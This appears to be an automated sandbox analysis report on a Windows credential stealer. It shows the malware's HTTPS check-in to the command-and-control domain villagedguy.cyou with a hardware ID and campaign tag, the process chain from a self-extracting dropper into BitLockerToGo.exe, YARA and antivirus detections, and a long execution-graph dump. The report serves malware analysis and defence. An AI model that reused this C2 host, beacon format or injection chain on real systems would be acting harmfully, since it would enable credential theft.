    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIibD2mtUyAGCFAiSK8RGgFzUd0lgbkKgavyjkuDmWST77OQpEauS64bbLevw3DyRu%2BTCCZ6fb1YfjgWda1h5kKL128nnYGEEm0znaaXl7ko7XIkwZrxpGSewQ8zXkM0YQ5e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8daf64eb1a2247a2-DFW
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=996&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2166&delivery_rate=2789980&cwnd=251&unsent_bytes=0&cid=8f5b0fbfcacdffa4&ts=484&x=0"
                                                                                                                                                                        2024-10-31 00:05:34 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


Session ID: 9
Source IP: 192.168.2.4
Source Port: 49745
Destination IP: 104.21.32.196
Destination Port: 443
PID: 2676
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 00:05:35 UTC | 281 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1117
Host: villagedguy.cyou
2024-10-31 00:05:35 UTC | 1117 bytes | OUT | Data (multipart/form-data body, decoded from the raw bytes; the dump ends after the last boundary marker):
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

5E550C58F802B17BB818A83A1A3BD1B5
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

1
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

tLYMe5--3
--
2024-10-31 00:05:36 UTC | 1007 bytes | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 00:05:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=s363s9f4gb305l4loqg6cflpa0; expires=Sun, 23-Feb-2025 17:52:14 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=muG1CwzFxqdnCkkKkAKFD01jem3oyRZohsUEkPt5erdJxETjp1R%2F9VTr2eB%2BNU2HdUuiHTWVmUBrnI2FtbupRbjyCWMVGeeUGtC6uecjYXctPR5SJpCMtERe4f2UJBN%2BAQDI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8daf64f2bc6ab789-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2034&delivery_rate=2177443&cwnd=39&unsent_bytes=0&cid=8412496ea1b3d61d&ts=339&x=0"
2024-10-31 00:05:36 UTC | 23 bytes | IN | Data (chunked body, decoded; chunk size 0x11 = 17 bytes):
11
ok 173.254.250.78
2024-10-31 00:05:36 UTC | 5 bytes | IN | Data (terminating zero-length chunk, decoded):
0



Target ID: 0
Start time: 20:05:02
Start date: 30/10/2024
Path: C:\Users\user\Desktop\HLZwUhcJ28.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\HLZwUhcJ28.exe"
Imagebase: 0x7ff70ecd0000
File size: 13'706'949 bytes
MD5 hash: B736DA6A81E01BEBFDD469D26785E13C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 20:05:04
Start date: 30/10/2024
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe"
Imagebase: 0x980000
File size: 17'504'256 bytes
MD5 hash: C1A90FA945AD6CED2104263762C7FCB4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000001.00000002.1881484672.000000000A7D8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Avira
• Detection: 83%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 2
Start time: 20:05:15
Start date: 30/10/2024
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase: 0x150000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983486359.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1982657253.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983200877.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983911161.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1981900349.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1982913303.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1983703963.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1982143036.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Execution Graph

Execution Coverage: 13.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 32.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 48
20550->20468 20557 7ff70ecf5aeb 20555->20557 20556 7ff70ecf5b04 20556->20506 20557->20556 20559 7ff70ecf5b0a 20557->20559 20565 7ff70ecff0c8 EnterCriticalSection LeaveCriticalSection abort 20557->20565 20560 7ff70ecf5b15 20559->20560 20566 7ff70ecf674c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20559->20566 20567 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 20560->20567 20565->20557 20566->20560 20572 7ff70ecd13cd 20571->20572 20578 7ff70ecd144d GetCurrentDirectoryW 20571->20578 20573 7ff70ecd145d 20572->20573 20574 7ff70ecd13ee memcpy_s 20572->20574 20580 7ff70ecd1be8 33 API calls std::_Xinvalid_argument 20573->20580 20579 7ff70ecd196c 31 API calls _invalid_parameter_noinfo_noreturn 20574->20579 20578->20538 20579->20578 20581->20548 20582->20487 20586 7ff70ecd90c6 20585->20586 20587 7ff70ecd8f5a 20585->20587 20593 7ff70ecd353c 47 API calls 20586->20593 20591 7ff70ecd8f74 memcpy_s 20587->20591 20592 7ff70ecd6edc 33 API calls 2 library calls 20587->20592 20591->20502 20592->20591 20594->20369 20596->20374 20657 7ff70ecd32f0 20665 7ff70ecd3327 20657->20665 20658 7ff70ecd335b 20659 7ff70ecf5c30 _handle_error 8 API calls 20658->20659 20660 7ff70ecd33dd 20659->20660 20662 7ff70ecd33c3 20664 7ff70ecd1b70 31 API calls 20662->20664 20664->20658 20665->20658 20665->20662 20666 7ff70ecd33ee 20665->20666 20670 7ff70ecd6858 20665->20670 20693 7ff70ecddacc 20665->20693 20667 7ff70ecd33ff 20666->20667 20697 7ff70ecdd9b4 CompareStringW 20666->20697 20667->20662 20669 7ff70ecd1c80 33 API calls 20667->20669 20669->20662 20672 7ff70ecd6898 20670->20672 20671 7ff70ecd6962 20698 7ff70ecd6ae8 20671->20698 20672->20671 20679 7ff70ecd68d6 __vcrt_FlsAlloc 20672->20679 20705 7ff70ece0ad0 CompareStringW 20672->20705 20674 7ff70ecf5c30 _handle_error 8 API calls 20675 7ff70ecd6ac7 20674->20675 20675->20665 20677 7ff70ecd6a85 20680 7ff70ecd68fd 20677->20680 20708 7ff70ecdd9d0 CompareStringW 20677->20708 
20679->20680 20682 7ff70ecd6946 __vcrt_FlsAlloc 20679->20682 20706 7ff70ece0ad0 CompareStringW 20679->20706 20680->20674 20682->20671 20682->20680 20683 7ff70ecd69fd 20682->20683 20684 7ff70ecd12bc 33 API calls 20682->20684 20688 7ff70ecd6a6a __vcrt_FlsAlloc 20682->20688 20686 7ff70ecd6adf 20683->20686 20687 7ff70ecd6a4d 20683->20687 20685 7ff70ecd69ea 20684->20685 20689 7ff70ecd885c 8 API calls 20685->20689 20690 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 20686->20690 20687->20680 20687->20688 20707 7ff70ece0ad0 CompareStringW 20687->20707 20688->20671 20688->20677 20688->20680 20689->20683 20692 7ff70ecd6ae4 20690->20692 20695 7ff70ecddadf 20693->20695 20694 7ff70ecddafd 20694->20665 20695->20694 20696 7ff70ecd1c80 33 API calls 20695->20696 20696->20694 20697->20667 20701 7ff70ecd6b14 20698->20701 20699 7ff70ecd6c1d 20700 7ff70ecd6ae8 CompareStringW 20699->20700 20703 7ff70ecd6bc1 20699->20703 20700->20699 20701->20699 20702 7ff70ecd6c02 20701->20702 20701->20703 20702->20703 20709 7ff70ecdd9d0 CompareStringW 20702->20709 20703->20680 20705->20679 20706->20682 20707->20688 20708->20680 20709->20703 20710 7ff70ecf4976 14 API calls _com_raise_error 21363 7ff70eceece0 21708 7ff70ecd215c 21363->21708 21365 7ff70eceed2b 21366 7ff70ecef9e3 21365->21366 21367 7ff70eceed3f 21365->21367 21517 7ff70eceed5c 21365->21517 21908 7ff70ecf2ee0 21366->21908 21369 7ff70eceed4f 21367->21369 21370 7ff70eceee2b 21367->21370 21367->21517 21374 7ff70eceedf9 21369->21374 21375 7ff70eceed57 21369->21375 21376 7ff70eceeee1 21370->21376 21383 7ff70eceee45 21370->21383 21372 7ff70ecf5c30 _handle_error 8 API calls 21373 7ff70ecefea0 21372->21373 21382 7ff70eceee1b EndDialog 21374->21382 21374->21517 21386 7ff70ecdaee0 48 API calls 21375->21386 21375->21517 21716 7ff70ecd1ebc GetDlgItem 21376->21716 21377 7ff70ecefa19 21380 7ff70ecefa25 SendDlgItemMessageW 21377->21380 21381 7ff70ecefa40 GetDlgItem SendMessageW 21377->21381 21378 7ff70ecefa0a SendMessageW 21378->21377 
21380->21381 21385 7ff70ecd7a28 35 API calls 21381->21385 21382->21517 21387 7ff70ecdaee0 48 API calls 21383->21387 21388 7ff70ecefa97 GetDlgItem 21385->21388 21389 7ff70eceed86 21386->21389 21390 7ff70eceee63 SetDlgItemTextW 21387->21390 21927 7ff70ecd2120 21388->21927 21930 7ff70ecd1a94 34 API calls _handle_error 21389->21930 21395 7ff70eceee76 21390->21395 21393 7ff70eceef45 21412 7ff70ecef815 21393->21412 21533 7ff70eceef01 EndDialog 21393->21533 21394 7ff70eceef58 GetDlgItem 21399 7ff70eceef72 SendMessageW SendMessageW 21394->21399 21400 7ff70eceef9f SetFocus 21394->21400 21404 7ff70eceee90 GetMessageW 21395->21404 21395->21517 21398 7ff70eceed96 21403 7ff70eceedac 21398->21403 21409 7ff70ecd210c SetDlgItemTextW 21398->21409 21399->21400 21405 7ff70eceefb5 21400->21405 21406 7ff70ecef042 21400->21406 21401 7ff70eceef2a 21407 7ff70ecd1b70 31 API calls 21401->21407 21422 7ff70ecefeb3 21403->21422 21403->21517 21411 7ff70eceeeae IsDialogMessageW 21404->21411 21404->21517 21413 7ff70ecdaee0 48 API calls 21405->21413 21931 7ff70ecd2314 21406->21931 21407->21517 21409->21403 21411->21395 21416 7ff70eceeec3 TranslateMessage DispatchMessageW 21411->21416 21417 7ff70ecdaee0 48 API calls 21412->21417 21418 7ff70eceefbf 21413->21418 21415 7ff70ecef07c 21941 7ff70ecf2ad0 33 API calls 2 library calls 21415->21941 21416->21395 21419 7ff70ecef826 SetDlgItemTextW 21417->21419 21429 7ff70ecd12bc 33 API calls 21418->21429 21423 7ff70ecdaee0 48 API calls 21419->21423 21424 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21422->21424 21428 7ff70ecef858 21423->21428 21430 7ff70ecefeb8 21424->21430 21426 7ff70ecef087 21427 7ff70ecdaee0 48 API calls 21426->21427 21433 7ff70ecef0a5 21427->21433 21444 7ff70ecd12bc 33 API calls 21428->21444 21434 7ff70eceefe8 21429->21434 21439 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21430->21439 21436 7ff70ecdda04 48 API calls 21433->21436 21437 7ff70ecf2bf4 24 API calls 21434->21437 21443 7ff70ecef0b8 21436->21443 
21445 7ff70eceeff5 21437->21445 21447 7ff70ecefebe 21439->21447 21451 7ff70ecf2bf4 24 API calls 21443->21451 21477 7ff70ecef881 21444->21477 21445->21430 21461 7ff70ecef038 21445->21461 21457 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21447->21457 21454 7ff70ecef0c8 21451->21454 21467 7ff70ecd1b70 31 API calls 21454->21467 21455 7ff70ecef92a 21460 7ff70ecdaee0 48 API calls 21455->21460 21462 7ff70ecefec4 21457->21462 21472 7ff70ecef934 21460->21472 21469 7ff70ecef13c 21461->21469 21942 7ff70ecf3584 33 API calls 2 library calls 21461->21942 21482 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21462->21482 21476 7ff70ecef0d6 21467->21476 21470 7ff70ecef16a 21469->21470 21943 7ff70ecd587c 21469->21943 21481 7ff70ecd552c 56 API calls 21470->21481 21493 7ff70ecd12bc 33 API calls 21472->21493 21476->21447 21476->21461 21477->21455 21488 7ff70ecd12bc 33 API calls 21477->21488 21486 7ff70ecef180 21481->21486 21487 7ff70ecefeca 21482->21487 21491 7ff70ecef184 GetLastError 21486->21491 21492 7ff70ecef19c 21486->21492 21499 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21487->21499 21494 7ff70ecef8cf 21488->21494 21491->21492 21730 7ff70ecd8cf8 21492->21730 21498 7ff70ecef95d 21493->21498 21501 7ff70ecdaee0 48 API calls 21494->21501 21497 7ff70ecef15e 21946 7ff70eced908 12 API calls _handle_error 21497->21946 21515 7ff70ecd12bc 33 API calls 21498->21515 21505 7ff70ecefed0 21499->21505 21506 7ff70ecef8da 21501->21506 21516 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21505->21516 21970 7ff70ecd1170 33 API calls memcpy_s 21506->21970 21508 7ff70ecef1ae 21513 7ff70ecef1b5 GetLastError 21508->21513 21514 7ff70ecef1c4 21508->21514 21511 7ff70ecef8f2 21522 7ff70ecd1c04 33 API calls 21511->21522 21513->21514 21518 7ff70ecef26c 21514->21518 21523 7ff70ecef27b 21514->21523 21524 7ff70ecef1db GetTickCount 21514->21524 21519 7ff70ecef99e 21515->21519 21520 7ff70ecefed6 21516->21520 21517->21372 21518->21523 21541 
7ff70ecef6c9 21518->21541 21535 7ff70ecd1b70 31 API calls 21519->21535 21525 7ff70ecd215c 61 API calls 21520->21525 21526 7ff70ecef90e 21522->21526 21527 7ff70ecef5a0 21523->21527 21947 7ff70ecd7c10 21523->21947 21733 7ff70ecd5238 21524->21733 21529 7ff70eceff34 21525->21529 21530 7ff70ecd1b70 31 API calls 21526->21530 21527->21533 21534 7ff70ecd6e5c 33 API calls 21527->21534 21536 7ff70eceff38 21529->21536 21544 7ff70eceffd9 GetDlgItem SetFocus 21529->21544 21573 7ff70eceff4d 21529->21573 21538 7ff70ecef91c 21530->21538 21533->21401 21542 7ff70ecef5c5 21534->21542 21543 7ff70ecef9c8 21535->21543 21553 7ff70ecf5c30 _handle_error 8 API calls 21536->21553 21547 7ff70ecd1b70 31 API calls 21538->21547 21539 7ff70ecef29e 21959 7ff70ecdbc90 131 API calls 21539->21959 21556 7ff70ecdaee0 48 API calls 21541->21556 21967 7ff70ecd1170 33 API calls memcpy_s 21542->21967 21552 7ff70ecd1b70 31 API calls 21543->21552 21549 7ff70ecf000a 21544->21549 21547->21455 21562 7ff70ecd12bc 33 API calls 21549->21562 21550 7ff70ecef20a 21555 7ff70ecd1b70 31 API calls 21550->21555 21558 7ff70ecef9d3 21552->21558 21559 7ff70ecf05e7 21553->21559 21554 7ff70ecef2b8 21561 7ff70ecdda04 48 API calls 21554->21561 21563 7ff70ecef218 21555->21563 21564 7ff70ecef6f7 SetDlgItemTextW 21556->21564 21557 7ff70ecef5da 21565 7ff70ecdaee0 48 API calls 21557->21565 21566 7ff70ecd1b70 31 API calls 21558->21566 21560 7ff70eceff84 SendDlgItemMessageW 21567 7ff70eceffa4 21560->21567 21568 7ff70eceffad EndDialog 21560->21568 21569 7ff70ecef2fa GetCommandLineW 21561->21569 21570 7ff70ecf001c 21562->21570 21581 7ff70ecd4334 51 API calls 21563->21581 21571 7ff70ecd2134 21564->21571 21572 7ff70ecef5e7 21565->21572 21566->21401 21567->21568 21568->21536 21574 7ff70ecef39f 21569->21574 21575 7ff70ecef3b9 21569->21575 21576 7ff70ecd8e0c 33 API calls 21570->21576 21577 7ff70ecef715 SetDlgItemTextW GetDlgItem 21571->21577 21968 7ff70ecd1170 33 API calls memcpy_s 21572->21968 21573->21536 21573->21560 21590 7ff70ecd1c80 33 
API calls 21574->21590 21960 7ff70ecee6a4 33 API calls _handle_error 21575->21960 21579 7ff70ecf0030 21576->21579 21582 7ff70ecef763 21577->21582 21583 7ff70ecef740 GetWindowLongPtrW SetWindowLongPtrW 21577->21583 21585 7ff70ecd210c SetDlgItemTextW 21579->21585 21587 7ff70ecef23e 21581->21587 21747 7ff70ecf09d8 21582->21747 21583->21582 21584 7ff70ecef5fa 21589 7ff70ecd1b70 31 API calls 21584->21589 21591 7ff70ecf0044 21585->21591 21586 7ff70ecef3ca 21961 7ff70ecee6a4 33 API calls _handle_error 21586->21961 21593 7ff70ecef245 GetLastError 21587->21593 21594 7ff70ecef254 21587->21594 21596 7ff70ecef605 21589->21596 21590->21575 21603 7ff70ecf0076 SendDlgItemMessageW FindFirstFileW 21591->21603 21593->21594 21743 7ff70ecd424c 21594->21743 21600 7ff70ecd1b70 31 API calls 21596->21600 21597 7ff70ecef3db 21962 7ff70ecee6a4 33 API calls _handle_error 21597->21962 21599 7ff70ecf09d8 188 API calls 21601 7ff70ecef78c 21599->21601 21602 7ff70ecef613 21600->21602 21900 7ff70ecf34c4 21601->21900 21613 7ff70ecdaee0 48 API calls 21602->21613 21608 7ff70ecf00cb 21603->21608 21702 7ff70ecf0554 21603->21702 21617 7ff70ecdaee0 48 API calls 21608->21617 21609 7ff70ecef3ec 21963 7ff70ecdbd30 131 API calls 21609->21963 21612 7ff70ecf09d8 188 API calls 21628 7ff70ecef7ba 21612->21628 21616 7ff70ecef62b 21613->21616 21614 7ff70ecef403 21964 7ff70ecf36e0 33 API calls 21614->21964 21615 7ff70ecf05d1 21615->21536 21629 7ff70ecd12bc 33 API calls 21616->21629 21622 7ff70ecf00ee 21617->21622 21619 7ff70ecf05f9 21620 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21619->21620 21624 7ff70ecf05fe 21620->21624 21621 7ff70ecef7e6 21969 7ff70ecd1e98 GetDlgItem EnableWindow 21621->21969 21633 7ff70ecd12bc 33 API calls 21622->21633 21623 7ff70ecef422 CreateFileMappingW 21626 7ff70ecef4a3 ShellExecuteExW 21623->21626 21627 7ff70ecef461 MapViewOfFile 21623->21627 21631 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21624->21631 21636 7ff70ecef4c4 21626->21636 21965 
7ff70ecf6e10 21627->21965 21628->21621 21632 7ff70ecf09d8 188 API calls 21628->21632 21642 7ff70ecef654 21629->21642 21634 7ff70ecf0604 21631->21634 21632->21621 21635 7ff70ecf011d 21633->21635 21640 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21634->21640 21971 7ff70ecd1170 33 API calls memcpy_s 21635->21971 21638 7ff70ecef4e6 WaitForInputIdle 21636->21638 21639 7ff70ecef513 21636->21639 21644 7ff70ecef4fb 21638->21644 21649 7ff70ecef53f 21639->21649 21650 7ff70ecef52c UnmapViewOfFile CloseHandle 21639->21650 21645 7ff70ecf060a 21640->21645 21641 7ff70ecef6aa 21646 7ff70ecd1b70 31 API calls 21641->21646 21642->21487 21642->21641 21643 7ff70ecf0138 21647 7ff70ecd52c0 33 API calls 21643->21647 21644->21639 21648 7ff70ecef501 Sleep 21644->21648 21654 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21645->21654 21646->21533 21651 7ff70ecf014f 21647->21651 21648->21639 21648->21644 21649->21462 21653 7ff70ecef575 21649->21653 21650->21649 21652 7ff70ecd1b70 31 API calls 21651->21652 21655 7ff70ecf015c 21652->21655 21657 7ff70ecd1b70 31 API calls 21653->21657 21656 7ff70ecf0610 21654->21656 21655->21624 21659 7ff70ecd1b70 31 API calls 21655->21659 21660 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21656->21660 21658 7ff70ecef592 21657->21658 21661 7ff70ecd1b70 31 API calls 21658->21661 21662 7ff70ecf01c3 21659->21662 21663 7ff70ecf0616 21660->21663 21661->21527 21664 7ff70ecd210c SetDlgItemTextW 21662->21664 21666 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21663->21666 21665 7ff70ecf01d7 FindClose 21664->21665 21667 7ff70ecf01f3 21665->21667 21668 7ff70ecf02e7 SendDlgItemMessageW 21665->21668 21669 7ff70ecf061c 21666->21669 21972 7ff70ecede44 10 API calls _handle_error 21667->21972 21671 7ff70ecf031b 21668->21671 21673 7ff70ecdaee0 48 API calls 21671->21673 21672 7ff70ecf0216 21674 7ff70ecdaee0 48 API calls 21672->21674 21675 7ff70ecf0328 21673->21675 21676 7ff70ecf021f 21674->21676 21678 7ff70ecd12bc 33 
API calls 21675->21678 21677 7ff70ecdda04 48 API calls 21676->21677 21682 7ff70ecf023c memcpy_s 21677->21682 21679 7ff70ecf0357 21678->21679 21973 7ff70ecd1170 33 API calls memcpy_s 21679->21973 21680 7ff70ecd1b70 31 API calls 21683 7ff70ecf02d3 21680->21683 21682->21634 21682->21680 21685 7ff70ecd210c SetDlgItemTextW 21683->21685 21684 7ff70ecf0372 21686 7ff70ecd52c0 33 API calls 21684->21686 21685->21668 21687 7ff70ecf0389 21686->21687 21688 7ff70ecd1b70 31 API calls 21687->21688 21689 7ff70ecf0395 memcpy_s 21688->21689 21690 7ff70ecd1b70 31 API calls 21689->21690 21691 7ff70ecf03cf 21690->21691 21692 7ff70ecd1b70 31 API calls 21691->21692 21693 7ff70ecf03dc 21692->21693 21693->21645 21694 7ff70ecd1b70 31 API calls 21693->21694 21695 7ff70ecf0443 21694->21695 21696 7ff70ecd210c SetDlgItemTextW 21695->21696 21697 7ff70ecf0457 21696->21697 21697->21702 21974 7ff70ecede44 10 API calls _handle_error 21697->21974 21699 7ff70ecf0482 21700 7ff70ecdaee0 48 API calls 21699->21700 21701 7ff70ecf048c 21700->21701 21703 7ff70ecdda04 48 API calls 21701->21703 21702->21536 21702->21615 21702->21619 21702->21663 21705 7ff70ecf04a9 memcpy_s 21703->21705 21704 7ff70ecd1b70 31 API calls 21706 7ff70ecf0540 21704->21706 21705->21656 21705->21704 21707 7ff70ecd210c SetDlgItemTextW 21706->21707 21707->21702 21709 7ff70ecd216a 21708->21709 21710 7ff70ecd21d0 21708->21710 21709->21710 21975 7ff70ecda8ac 21709->21975 21710->21365 21712 7ff70ecd218f 21712->21710 21713 7ff70ecd21a4 GetDlgItem 21712->21713 21713->21710 21714 7ff70ecd21b7 21713->21714 21714->21710 21715 7ff70ecd21be SetWindowTextW 21714->21715 21715->21710 21717 7ff70ecd1f34 21716->21717 21718 7ff70ecd1efc 21716->21718 22025 7ff70ecd1ff8 GetWindowTextLengthW 21717->22025 21720 7ff70ecd12bc 33 API calls 21718->21720 21721 7ff70ecd1f2a memcpy_s 21720->21721 21722 7ff70ecd1b70 31 API calls 21721->21722 21723 7ff70ecd1f89 21721->21723 21722->21723 21724 7ff70ecd1fc8 21723->21724 21727 7ff70ecd1ff0 21723->21727 21725 7ff70ecf5c30 
_handle_error 8 API calls 21724->21725 21726 7ff70ecd1fdd 21725->21726 21726->21393 21726->21394 21726->21533 21728 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21727->21728 21729 7ff70ecd1ff5 21728->21729 21731 7ff70ecd8d03 21730->21731 21732 7ff70ecd8d06 SetCurrentDirectoryW 21730->21732 21731->21732 21732->21508 21734 7ff70ecd5265 21733->21734 21735 7ff70ecd527a 21734->21735 21736 7ff70ecd12bc 33 API calls 21734->21736 21737 7ff70ecf5c30 _handle_error 8 API calls 21735->21737 21736->21735 21738 7ff70ecd52b1 21737->21738 21739 7ff70eced1bc 21738->21739 21740 7ff70eced1e3 21739->21740 22037 7ff70ecd60e0 21740->22037 21742 7ff70eced1f3 memcpy_s 21742->21550 21744 7ff70ecd4266 21743->21744 21746 7ff70ecd4272 21743->21746 21745 7ff70ecd42d0 100 API calls 21744->21745 21744->21746 21745->21746 22046 7ff70ecee558 21747->22046 21749 7ff70ecf0d3e 21750 7ff70ecd1b70 31 API calls 21749->21750 21751 7ff70ecf0d47 21750->21751 21752 7ff70ecf5c30 _handle_error 8 API calls 21751->21752 21754 7ff70ecef77b 21752->21754 21753 7ff70ecdd124 33 API calls 21889 7ff70ecf0a53 memcpy_s 21753->21889 21754->21599 21755 7ff70ecf2a4a 22134 7ff70ecd353c 47 API calls 21755->22134 21758 7ff70ecf2a50 22135 7ff70ecd353c 47 API calls 21758->22135 21760 7ff70ecf2a56 21765 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21760->21765 21762 7ff70ecf2a3e 21763 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21762->21763 21764 7ff70ecf2a44 21763->21764 22133 7ff70ecd353c 47 API calls 21764->22133 21767 7ff70ecf2a5c 21765->21767 21769 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21767->21769 21771 7ff70ecf2a62 21769->21771 21770 7ff70ecf299a 21772 7ff70ecf2a22 21770->21772 21774 7ff70ecd1c80 33 API calls 21770->21774 21773 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21771->21773 22131 7ff70ecd1b50 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 21772->22131 21778 7ff70ecf2a68 21773->21778 21781 
7ff70ecf29c7 21774->21781 21775 7ff70ecf2a38 22132 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21775->22132 21776 7ff70ecd13c4 33 API calls 21777 7ff70ecf178a GetTempPathW 21776->21777 21777->21889 21784 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21778->21784 21779 7ff70ecd7a28 35 API calls 21779->21889 22130 7ff70ecee738 33 API calls 3 library calls 21781->22130 21790 7ff70ecf2a6e 21784->21790 21785 7ff70ecd2120 SetWindowTextW 21785->21889 21788 7ff70ecf29dd 21795 7ff70ecd1b70 31 API calls 21788->21795 21796 7ff70ecf29f4 memcpy_s 21788->21796 21789 7ff70ecff094 43 API calls 21789->21889 21797 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21790->21797 21792 7ff70ecd1b70 31 API calls 21792->21772 21793 7ff70ecd1c04 33 API calls 21793->21889 21794 7ff70ecf2343 21794->21772 21794->21775 21798 7ff70ecf5ae0 4 API calls 21794->21798 21805 7ff70ecf238b memcpy_s 21794->21805 21795->21796 21796->21792 21799 7ff70ecf2a74 21797->21799 21798->21805 21804 